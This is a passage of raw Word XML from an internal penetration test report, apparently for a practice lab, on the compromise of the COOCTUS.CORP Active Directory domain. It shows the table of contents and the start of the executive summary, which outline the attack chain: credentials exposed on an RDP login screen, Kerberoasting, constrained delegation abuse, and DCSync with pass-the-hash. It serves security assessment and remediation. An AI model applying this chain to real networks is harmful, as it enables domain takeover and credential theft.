            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251539 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3. Attack Narrative (Walkthrough)</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251540">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251540 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.1 Reconnaissance</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251541">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251541 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.2 Web Enumeration</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251542">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251542 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.3 Initial Access - RDP Credential Disclosure</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251543">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251543 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.4 SMB Enumeration &amp; User Flag</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251544">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251544 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.5 LDAP Enumeration</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251545">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251545 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.6 Kerberoasting the password-reset Account</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251546">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251546 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.7 Privilege Escalation - Constrained Delegation Abuse</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251547">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251547 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.8 Domain Dominance - DCSync &amp; Pass-the-Hash</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251548">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251548 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.9 Post-Exploitation - Objective &amp; Flag Collection</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251549">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251549 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4. Attack Chain Summary</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251550">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251550 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4.1 Room Objective / Flag Register</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251551">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251551 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5. Technical Findings</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251552">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251552 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Finding 1: Kerberos Constrained Delegation Abuse Leading to Domain Compromise</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251553">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251553 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Finding 2: Plaintext Credentials Exposed on RDP Login Screen</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251554">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251554 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Finding 3: Kerberoastable Service Account with Weak Password</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251555">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251555 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Finding 4: Sensitive Information Disclosure via Web Backup File</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251556">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251556 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>6. Consolidated Recommendations</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251557">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251557 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Immediate (0–7 days)</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251558">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251558 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Short-term (1–4 weeks)</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251559">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251559 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Strategic (ongoing)</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251560">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251560 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Appendix A: Compromised Assets &amp; Flags</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251561">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251561 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Appendix B: Severity Rating Definitions</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc234251530"/>
      <w:r>
        <w:rPr/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Cooctus Corp engaged the assessor to perform an internal penetration test against its Active Directory (AD) environment, centered on the Domain Controller at 10.64.148.30. The objective was to evaluate the internal security posture, identify exploitable misconfigurations, and demonstrate the realistic business impact of a determined attacker operating from inside the network perimeter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The engagement resulted in a full compromise of the COOCTUS.CORP domain. Starting with no credentials, the assessor chained a series of weaknesses - exposed credentials, weak service-account password policy, and a dangerous Kerberos delegation misconfiguration - to escalate from anonymous access to full Domain Administrator control and extraction of every credential hash in the directory (NTDS.dit).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc234251531"/>
      <w:r>
        <w:rPr/>
        <w:t>Summary of the Attack Path</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reconnaissance identified a Windows Domain Controller exposing a Microsoft IIS 10.0 web server alongside the standard suite of AD services (DNS, Kerberos, LDAP, SMB, RDP).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Initial access was obtained by connecting to the host over RDP, where a graphical “sticky note” on the Windows login screen disclosed valid credentials for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visitor</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visitor</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account, the assessor enumerated Active Directory over LDAP and identified the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password-reset</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> service account, which was vulnerable to Kerberoasting. Its Kerberos ticket was cracked offline to recover the plaintext password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
